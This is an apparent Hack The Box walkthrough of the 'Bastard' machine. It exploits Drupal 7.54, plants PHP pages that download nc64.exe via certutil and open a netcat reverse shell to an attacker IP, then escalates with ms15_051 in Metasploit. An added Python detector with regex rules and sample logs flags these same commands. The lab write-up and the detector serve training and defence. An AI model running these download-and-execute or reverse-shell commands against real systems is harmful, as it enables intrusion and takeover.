
HTB Bastard: Walkthrough



  • We’re first met with a web application running Drupal that leaks a useful directory through the robots.txt file.
  • That file contains the version number of the Drupal installation running on the web server.
  • We’re then able to leverage that version number to exploit a CVE, gain credentials and eventually RCE.
  • Finally, once the machine is compromised, we exploit ms15_051 to gain administrative privileges.

0) Machine Overview

  1. Scans
  2. Web Enumeration
  3. Exploitation
  4. Privilege Escalation

1) Scans


2) Web Enumeration

Heading to the webpage, we’re met with Drupal.

With some testing, and checking the robots.txt, we notice:


As we can see, we now know the exact version number of the CMS being used.

3) Exploitation

A quick search for “Drupal 7.54 exploit” instantly turns up:

We used the exploit, but we had to alter some of the code. Originally I only changed the URL to the proper IP; as we can see, the endpoint_path is set to /rest-endpoint, but the exploit doesn’t work.

So if we try to access that endpoint ourselves, it turns out it doesn’t exist for us.


What if we try just /rest? Searching that error together with Drupal turns up some Stack Overflow questions showing that /rest is also a possible endpoint.

With that fixed:


Now the exploit creates a .php file on the server, and the exploit code retrieves credentials:

Also the session information:


So we can either log into the admin dashboard and investigate, or change the data to give us a shell of some sort; it would have to be in PHP, though.

Let’s first try adding some of those cookies into our browser:

Here, we put the session name value into the name field, and the id into the value field:

I was having trouble getting a rev shell with the exploit code, so we’ll have to do it manually.

We’re going to follow this: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/drupal#rce

Note: this only works for Drupal versions before 8.

So, after a lot of research and some PHP errors, I was able to use this code on a new page within the “Add-content” section:

<?php
// Fetch nc64.exe from the attacker-controlled host with certutil and print the output.
$command = "certutil.exe -urlcache -f http://10.10.14.15:8080/nc64.exe nc64.exe";
$output = shell_exec($command);
echo $output;
?>

And then to execute it (it turns out shell_exec is exactly what I needed in this case):

<?php
// Connect back to the listener on 10.10.14.15:1234 with a cmd shell.
shell_exec('nc64.exe -e cmd 10.10.14.15 1234');
?>
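As an added defender-side example (not part of the original walkthrough), the following Python flags what this chain leaves in process-creation telemetry: a web server process spawning cmd.exe, certutil -urlcache used as a downloader, and a netcat -e reverse shell. The pipe-separated log format, the web server image names and the sample events are assumptions constructed for the example.

```python
import re
from typing import Dict, List

# Web server binaries that should not be spawning shells; a PHP shell_exec()
# call from a Drupal page runs exactly this way (assumed Apache/IIS image names).
WEB_SERVER_IMAGES = {"httpd.exe", "w3wp.exe", "php-cgi.exe", "nginx.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "certutil.exe"}

# LOLBin download: certutil -urlcache -f <URL> <file>
CERTUTIL_DOWNLOAD = re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*-f\b.*https?://", re.I)
# Netcat-style reverse shell: nc/nc64/ncat ... -e <program> <ipv4> <port>
NC_REVERSE_SHELL = re.compile(
    r"\b(?:nc|nc64|ncat)(?:\.exe)?\b.*\s-e\s+\S+\s+\d{1,3}(?:\.\d{1,3}){3}\s+\d+", re.I)

# Constructed sample events: timestamp | parent image | image | command line
SAMPLE_EVENTS = r"""
2024-01-01T10:00:01 | C:\xampp\apache\bin\httpd.exe | C:\Windows\System32\cmd.exe | cmd.exe /c certutil.exe -urlcache -f http://10.10.14.15:8080/nc64.exe nc64.exe
2024-01-01T10:00:05 | C:\xampp\apache\bin\httpd.exe | C:\Windows\System32\cmd.exe | cmd.exe /c nc64.exe -e cmd 10.10.14.15 1234
2024-01-01T10:01:00 | C:\Windows\explorer.exe | C:\Windows\System32\certutil.exe | certutil.exe -verify cert.cer
2024-01-01T10:02:00 | C:\Windows\explorer.exe | C:\Windows\System32\notepad.exe | notepad.exe notes.txt
"""

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_event(line: str) -> Dict[str, str]:
    ts, parent, image, cmdline = (f.strip() for f in line.split("|", 3))
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}

def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one alert per (event, rule) match, in log order."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        hits = []
        if basename(ev["parent"]) in WEB_SERVER_IMAGES and basename(ev["image"]) in SHELL_IMAGES:
            hits.append("webserver_spawned_shell")
        if CERTUTIL_DOWNLOAD.search(ev["cmdline"]):
            hits.append("certutil_urlcache_download")
        if NC_REVERSE_SHELL.search(ev["cmdline"]):
            hits.append("netcat_reverse_shell")
        alerts.extend({"ts": ev["ts"], "rule": r, "cmdline": ev["cmdline"]} for r in hits)
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f'{alert["ts"]} {alert["rule"]}: {alert["cmdline"]}')
```

The legitimate certutil -verify run and notepad launch produce no alerts; the two web-server-spawned commands produce four.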

4) Privilege Escalation

Now that we had access to the machine, I uploaded a Meterpreter executable so I could use Metasploit.

Once that was done, I ran local_exploit_suggester on the target and was given multiple exploits the target seemed to be vulnerable to.

I tried multiple, but the one that worked was ms15_051. Using the Metasploit module for it, I just had to make sure the payload was set to windows/x64/meterpreter/reverse_tcp (stressing the x64, as without it, it wouldn’t work). I also made sure the target was set to Windows x64, and that the original Meterpreter session was migrated to an x64 process.

Pwned.


This post is licensed under CC BY 4.0 by the author.